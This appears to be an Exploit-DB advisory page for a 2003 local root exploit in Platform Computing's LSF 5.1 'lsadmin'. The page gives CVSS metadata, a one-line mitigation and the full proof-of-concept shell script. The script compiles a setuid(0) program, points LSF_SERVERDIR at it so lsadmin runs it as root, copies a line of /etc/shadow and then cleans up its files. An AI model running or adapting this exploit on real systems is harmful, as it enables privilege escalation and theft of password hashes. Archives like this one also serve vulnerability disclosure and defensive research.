LSF 5.1 'lsadmin' local root exploit

vendor:

Load Sharing Facility

by:

CADENCE of Lam3rZ

7.2

CVSS

HIGH

Improper Handling of Input in Environment Variables

CWE

Product Name: Load Sharing Facility

Affected Version From: LSF 5.1

Affected Version To: LSF 5.1

Patch Exists: YES

Related CWE: N/A

CPE: a:platform_computing:load_sharing_facility:5.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2003

LSF 5.1 ‘lsadmin’ local root exploit

It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system. A proof of concept code is provided which creates a file containing the contents of the /etc/shadow file, which can then be read by the attacker.

Mitigation:

Ensure that environment variables are properly sanitized and validated before use.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7655/info

It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system. 

# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file